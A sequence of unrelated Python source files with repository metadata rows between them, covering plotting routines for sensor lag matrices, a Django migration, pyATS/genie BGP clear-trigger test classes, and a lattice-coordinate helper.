cmap = sns.diverging_palette(220, 10, as_cmap=True)
# Draw the heatmap with the mask and correct aspect ratio
sns.heatmap(to_plot, mask=None, cmap=cmap,
vmax=1.0, vmin=-1.0,
square=True, xticklabels=5, yticklabels=5,
linewidths=.5, cbar_kws={"shrink": .5}, ax=ax)
plt.title('Spatio Temporal Distance Matrix (Distances)')
if ax is None:
return fig
else:
return ax
def visualize_SLM(nexa_object, cmap='coolwarm', inter='none',
origin='upper', fontsize=16, aspect='auto',
colorbar=True, ax=None, symmetry=True):
"""
Document
"""
SLM = nexa_object.SLM
to_plot = SLM
# First the parameters
to_plot_title = 'Sensor Lagged Matrix'
cmap = cmap
inter = inter
origin = origin
fontsize = fontsize # The fontsize
xlabel = 'Time Windows'
ylabel = 'Lagged Sensors'
if ax is None:
fig_size = (16, 12)
axes_position = [0.1, 0.1, 0.8, 0.8]
fig = plt.figure(figsize=fig_size)
ax = fig.add_axes(axes_position)
if symmetry:
# We create symmetric vmin and vmax
max_value = np.abs(np.max(to_plot))
min_value = np.abs(np.min(to_plot))
vmax = np.max((max_value, min_value))
vmin = -vmax
im = ax.imshow(to_plot, interpolation=inter, vmin=vmin,
vmax=vmax, cmap=cmap, origin=origin,
aspect=aspect)
else:
im = ax.imshow(to_plot, interpolation=inter, cmap=cmap,
origin=origin, aspect=aspect)
fig = im.get_figure()
# Se the labels and titles
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
ax.set_title(to_plot_title)
# Change the font sizes
axes = fig.get_axes()
for ax in axes:
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +
ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(fontsize)
# Colorbar (This makes the axes to display proper)
if colorbar:
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar = fig.colorbar(im, cax=cax)
cbar.solids.set_edgecolor('face')
return im
def visualize_STDM(nexa_object, cmap='coolwarm', inter='none',
origin='upper', fontsize=16, aspect='auto',
colorbar=True):
"""
Document
"""
Nlags = nexa_object.Nlags
Nsensors = nexa_object.sensors.Nsensors
STDM = nexa_object.STDM
to_plot = STDM
# First the parameters
to_plot_title = 'Spatio Temporal Distance Matrix'
cmap = cmap
inter = inter
origin = origin
fontsize = fontsize # The fontsize
fig_size = (16, 12)
axes_position = [0.1, 0.1, 0.8, 0.8]
xlabel = 'Time lags * Sensors'
ylabel = xlabel
fig = plt.figure(figsize=fig_size)
ax = fig.add_axes(axes_position)
im = plt.imshow(to_plot, interpolation=inter, cmap=cmap,
origin=origin, aspect=aspect)
# Se the labels and titles
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
ax.set_title(to_plot_title)
# Se the ticks names for x
# x_labels = np.arange(Nseries * Nseries + 1)
# ax.xaxis.set_major_formatter(plt.FixedFormatter(x_labels))
# ax.xaxis.set_major_locator(plt.MultipleLocator(1))
# Change the font sizes
axes = fig.get_axes()
for ax in axes:
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +
ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(fontsize)
# Colorbar (This makes the axes to display proper)
if colorbar:
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar = fig.colorbar(im, cax=cax)
cbar.solids.set_edgecolor('face')
return fig
def visualize_SLM_hdf5(database, run_name, cmap='coolwarm', inter='none',
origin='upper', fontsize=16, aspect='auto',
colorbar=True, ax=None, symmetry=True):
"""
This visualizes the SLM for a particular database
of a hdf5 storage and a particular run.
"""
SLM = load.get_SLM_hdf5(database, run_name)
to_plot = SLM
# First the parameters
to_plot_title = 'Sensor Lagged Matrix'
cmap = cmap
inter = inter
origin = origin
fontsize = fontsize # The fontsize
xlabel = 'Time Windows'
ylabel = 'Lagged Sensors'
if ax is None:
fig_size = (16, 12)
axes_position = [0.1, 0.1, 0.8, 0.8]
fig = plt.figure(figsize=fig_size)
ax = fig.add_axes(axes_position)
if symmetry:
# We create symmetric vmin and vmax
max_value = np.abs(np.max(to_plot))
min_value = np.abs(np.min(to_plot))
vmax = np.max((max_value, min_value))
vmin = -vmax
im = ax.imshow(to_plot, interpolation=inter, vmin=vmin,
vmax=vmax, cmap=cmap, origin=origin,
aspect=aspect)
else:
im = ax.imshow(to_plot, interpolation=inter, cmap=cmap,
origin=origin, aspect=aspect)
fig = im.get_figure()
# Se the labels and titles
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
ax.set_title(to_plot_title)
# Change the font sizes
axes = fig.get_axes()
for ax in axes:
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +
ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(fontsize)
# Colorbar (This makes the axes to display proper)
if colorbar:
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar = fig.colorbar(im, cax=cax)
cbar.solids.set_edgecolor('face')
return im
def visualize_STDM_hdf5(database, run_name, nexa_arrangement,
ax=None):
"""
Routine which plots the STDM using seaborn
and extracting this from a hdf5 representation
"""
sns.set(font_scale=2)
to_plot = load.get_STDM_hdf5(database, run_name, nexa_arrangement)
if ax is None:
fig, ax = plt.subplots(figsize=(11, 9))
# Generate a custom diverging colormap
cmap = sns.diverging_palette(220, 10, as_cmap=True)
# Draw the heatmap with the mask and correct aspect ratio
ax = sns.heatmap(to_plot, mask=None, cmap=cmap,
vmax=1.0, vmin=-1.0,
square=True, xticklabels=False, yticklabels=False,
linewidths=.5, cbar_kws={"shrink": .5}, ax=ax)
ax.set_title('Spatio Temporal Distance Matrix')
return ax
| 28.470588
| 73
| 0.605923
| 971
| 7,260
| 4.397528
| 0.176107
| 0.030913
| 0.015457
| 0.01171
| 0.813583
| 0.765808
| 0.759016
| 0.742155
| 0.728571
| 0.728571
| 0
| 0.018196
| 0.28843
| 7,260
| 254
| 74
| 28.582677
| 0.808362
| 0.151102
| 0
| 0.79085
| 0
| 0
| 0.054407
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03268
| false
| 0
| 0.03268
| 0
| 0.104575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4f2a1c1d9195376a459d2b9a60f9b3417647077
| 100
|
py
|
Python
|
shadowhand_gym/envs/tasks/__init__.py
|
szahlner/shadowhand-gym
|
a7fbbe8ddcc2ecbead9349b0f377a3066ca94233
|
[
"MIT"
] | 11
|
2021-08-30T12:09:16.000Z
|
2021-12-13T15:10:27.000Z
|
shadowhand_gym/envs/tasks/__init__.py
|
szahlner/shadowhand-gym
|
a7fbbe8ddcc2ecbead9349b0f377a3066ca94233
|
[
"MIT"
] | null | null | null |
shadowhand_gym/envs/tasks/__init__.py
|
szahlner/shadowhand-gym
|
a7fbbe8ddcc2ecbead9349b0f377a3066ca94233
|
[
"MIT"
] | null | null | null |
from shadowhand_gym.envs.tasks.reach import Reach
from shadowhand_gym.envs.tasks.block import Block
| 33.333333
| 49
| 0.86
| 16
| 100
| 5.25
| 0.5
| 0.333333
| 0.404762
| 0.5
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 100
| 2
| 50
| 50
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f21b5516002873952cdf2344898cd77f63730f62
| 959
|
py
|
Python
|
app/migrations/0005_auto_20201111_2107.py
|
1-gut/musicsamples
|
a2846cb91534885ba5ef82d893658c2c74302455
|
[
"MIT"
] | null | null | null |
app/migrations/0005_auto_20201111_2107.py
|
1-gut/musicsamples
|
a2846cb91534885ba5ef82d893658c2c74302455
|
[
"MIT"
] | 11
|
2022-02-01T20:49:15.000Z
|
2022-03-28T18:17:46.000Z
|
app/migrations/0005_auto_20201111_2107.py
|
1-gut/musicsamples
|
a2846cb91534885ba5ef82d893658c2c74302455
|
[
"MIT"
] | 2
|
2021-09-17T08:38:14.000Z
|
2021-09-17T10:21:25.000Z
|
# Generated by Django 3.1.2 on 2020-11-11 21:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("app", "0004_historicalsample"),
]
operations = [
migrations.AddField(
model_name="historicalsample",
name="sample_volume",
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name="historicalsample",
name="sample_volume_units",
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AddField(
model_name="sample",
name="sample_volume",
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name="sample",
name="sample_volume_units",
field=models.CharField(blank=True, max_length=30, null=True),
),
]
| 28.205882
| 73
| 0.584984
| 95
| 959
| 5.768421
| 0.4
| 0.109489
| 0.167883
| 0.19708
| 0.733577
| 0.733577
| 0.733577
| 0.733577
| 0.625912
| 0.625912
| 0
| 0.034277
| 0.300313
| 959
| 33
| 74
| 29.060606
| 0.782414
| 0.046924
| 0
| 0.740741
| 1
| 0
| 0.144737
| 0.023026
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
480d4191c44ca1f5784c2abf84844dcb578c2a6a
| 32
|
py
|
Python
|
test/regression/features/lists/list_append.py
|
ppelleti/berp
|
30925288376a6464695341445688be64ac6b2600
|
[
"BSD-3-Clause"
] | 137
|
2015-02-13T21:03:23.000Z
|
2021-11-24T03:53:55.000Z
|
test/regression/features/lists/list_append.py
|
ppelleti/berp
|
30925288376a6464695341445688be64ac6b2600
|
[
"BSD-3-Clause"
] | 4
|
2015-04-01T13:49:13.000Z
|
2019-07-09T19:28:56.000Z
|
test/regression/features/lists/list_append.py
|
bjpop/berp
|
30925288376a6464695341445688be64ac6b2600
|
[
"BSD-3-Clause"
] | 8
|
2015-04-25T03:47:52.000Z
|
2019-07-27T06:33:56.000Z
|
print([1,2,3] + [4,5,6,7] + [])
| 16
| 31
| 0.375
| 8
| 32
| 1.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 0.15625
| 32
| 1
| 32
| 32
| 0.185185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
48394a5e90fb39a8a4d4b29f7a66203d3831e541
| 26,528
|
py
|
Python
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/clear/bgp/clear.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/clear/bgp/clear.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 1
|
2020-08-01T00:59:29.000Z
|
2020-08-01T00:59:32.000Z
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/clear/bgp/clear.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
'''Common implementation for bgp clear triggers'''
# python
from functools import partial
# genie libs
from genie.libs.sdk.libs.utils.mapping import Mapping
from genie.libs.sdk.triggers.clear.clear import TriggerClear, verify_clear_callable
from genie.libs.sdk.libs.utils.triggeractions import CompareUptime
# Ignore keys when doing the diff with Ops objects for save_snapshot and
# verify_clear, it will be used for LearnPollDiff.ops_diff callable
exclude = ['keepalives','total', 'total_bytes', 'up_time', 'opens', 'capability',
'updates', 'notifications', 'foreign_port', 'local_port', 'totals',
'bgp_table_version', 'route_refresh', 'maker', 'callables',
'connections_dropped', 'connections_established', 'last_reset',
'bgp_negotiated_keepalive_timers', 'distance_extern_as',
'reset_reason', 'holdtime', 'keepalive_interval']
class TriggerClearBgp(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '<',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[\
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'all', 'instance':'all',
'neighbor':'all'})
class TriggerClearBgpAll(TriggerClearBgp):
pass
class TriggerClearIpBgpSoft(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '>=',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[\
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'all', 'instance':'all',
'neighbor':'all'})
class TriggerClearBgpNeighbor(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '<',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[\
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'1', 'instance':'1',
'neighbor':'1'})
class TriggerClearBgpNeighborSoft(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '>=',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[\
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'1', 'instance':'1',
'neighbor':'1'})
class TriggerClearBgpNeighborIpv4(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '<',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>^[\d\.]+$)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'1', 'instance':'1','neighbor':'1'})
class TriggerClearBgpNeighborIpv6(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '<',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>^[\w\:]+$)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'1', 'instance':'1','neighbor':'1'})
class TriggerClearBgpNeighborSoftIpv4(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '>=',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>^[\d\.]+$)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'1', 'instance':'1','neighbor':'1'})
class TriggerClearBgpNeighborSoftIpv6(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '>=',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>^[\w\:]+$)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'1', 'instance':'1','neighbor':'1'})
class TriggerClearIpRouteCheckBgp(TriggerClearBgp):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '>=',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
'requirements':[\
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
'session_state', 'established']],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes':['info']},
'exclude': exclude}},
num_values={'vrf':'all', 'instance':'all',
'neighbor':'all'})
class TriggerClearBgpVpnv4UnicastVrfAll(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['routes_per_peer', 'instance', 'default',
'vrf', '(?P<vrf>.*)','neighbor','(?P<neighbor>.*)',
'address_family', '(?P<af>vpnv4 unicast.*)',
'up_down', '(.*)']],
'relation': '<',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp': {
'requirements': [ \
[['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'address_family','(?P<af>(vpnv4 unicast).*)',
'session_state', 'established']],
[['routes_per_peer', 'instance', 'default',\
'vrf', '(?P<vrf>.*)','neighbor','(?P<neighbor>.*)',\
'address_family', '(?P<af>(vpnv4 unicast).*)','(.*)']]],
'all_keys': True,
'kwargs': {'attributes': ['routes_per_peer','info']},
'exclude': exclude + ['msg_sent','msg_rcvd','up_down','tbl_ver']}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes': ['routes_per_peer','info']},
'exclude': exclude + ['msg_sent','msg_rcvd','up_down','tbl_ver']}},
num_values={'vrf': 'all','neighbor': 'all', 'af': 'all'})
class TriggerClearBgpVpnv6UnicastVrfAll(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['routes_per_peer', 'instance', 'default',
'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'address_family', '(?P<af>vpnv6 unicast.*)',
'up_down', '(.*)']],
'relation': '<',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp': {
'requirements': [ \
[['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'address_family', '(?P<af>(vpnv6 unicast).*)',
'session_state', 'established']],
[['routes_per_peer', 'instance', 'default', \
'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)', \
'address_family', '(?P<af>(vpnv6 unicast).*)', '(.*)']]],
'all_keys': True,
'kwargs': {'attributes': ['routes_per_peer','info']},
'exclude': exclude + ['msg_sent', 'msg_rcvd', 'up_down', 'tbl_ver']}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes': ['routes_per_peer','info']},
'exclude': exclude + ['msg_sent','msg_rcvd','up_down','tbl_ver']}},
num_values={'vrf': 'all', 'neighbor': 'all', 'af': 'all'})
class TriggerClearIpBgpVrfAll(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['routes_per_peer', 'instance', 'default',
'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'address_family', '(?P<af>ipv4.*)',
'up_down', '(.*)']],
'relation': '<',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp': {
'requirements': [ \
[['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'address_family', '(?P<af>.*)',
'session_state', 'established']],
[['routes_per_peer', 'instance', '(?P<instance>.*)', \
'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)', \
'address_family', '(?P<af>ipv4.*)', '(.*)']]],
'all_keys': True,
'kwargs': {'attributes': ['info','routes_per_peer']},
'exclude': exclude + ['msg_sent', 'msg_rcvd', 'up_down', 'tbl_ver']}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes': ['info','routes_per_peer']},
'exclude': exclude + ['msg_sent','msg_rcvd','up_down','tbl_ver']}},
num_values={'vrf': 'all', 'neighbor': 'all', 'af': 'all'})
class TriggerRestartBgp(TriggerClear):
# Argument with dynamic value for verify callable
# As verify callable can be re-used in multiple triggers
# with different variable names. This dictionary is used to map
# dynamic argument name to actual script argument name
# <expected argument_name for callable>: <script argument name>
verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
'(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'up_time', '(.*)']],
'relation': '<',
'threshold_time': 'compare_time',
'ops': 'ops'}
mapping = Mapping(requirements={'ops.bgp.bgp.Bgp': {
'requirements': [ \
['info', 'instance', '(?P<instance>.*)',
'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
'address_family', '(?P<af>.*)',
'session_state', 'established'],
['info','instance','(?P<instance>.*)','bgp_id', '(?P<bgp_id>.*)']
],
'all_keys': True ,
'kwargs': {'attributes': ['info']},
'exclude': exclude}},
verify_ops={'ops.bgp.bgp.Bgp':{
'requirements':[[partial(verify_clear_callable,
verify_func=CompareUptime.compare_uptime,
verify_func_args=verify_func_args)]],
'kwargs':{'attributes': ['info']},
'exclude': exclude}},
num_values={'vrf': 'all', 'instance': 'all', 'neighbor': 'all', 'bgp_id': 'all'})
| 59.214286
| 114
| 0.419783
| 2,000
| 26,528
| 5.4075
| 0.075
| 0.057698
| 0.050485
| 0.040222
| 0.905502
| 0.905502
| 0.898844
| 0.897642
| 0.897642
| 0.897642
| 0
| 0.002151
| 0.439196
| 26,528
| 447
| 115
| 59.346756
| 0.72481
| 0.144753
| 0
| 0.878205
| 0
| 0
| 0.252896
| 0.006456
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.003205
| 0.012821
| 0
| 0.141026
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
486cc2208dc9b5ba64b66938ab1d370515875e65
| 10,015
|
py
|
Python
|
modules/super_lattice.py
|
tbcole/majoranaJJ
|
dcf31f7786fa0a4874a940b7d8dcdd55f3921a46
|
[
"MIT"
] | null | null | null |
modules/super_lattice.py
|
tbcole/majoranaJJ
|
dcf31f7786fa0a4874a940b7d8dcdd55f3921a46
|
[
"MIT"
] | 2
|
2020-03-24T23:46:17.000Z
|
2020-04-19T20:29:08.000Z
|
modules/super_lattice.py
|
tbcole/majoranaJJ
|
dcf31f7786fa0a4874a940b7d8dcdd55f3921a46
|
[
"MIT"
] | 3
|
2020-04-30T08:48:12.000Z
|
2022-01-26T12:15:15.000Z
|
import numpy as np
from numpy import sqrt
class shapes:
def square(Nx, Ny):
N = Nx*Ny
coor = np.zeros((N,2))
for i in range(Nx):
for j in range(Ny):
n = i + Nx * j
#x = i, y = j
coor[n, 0] = i
coor[n, 1] = j
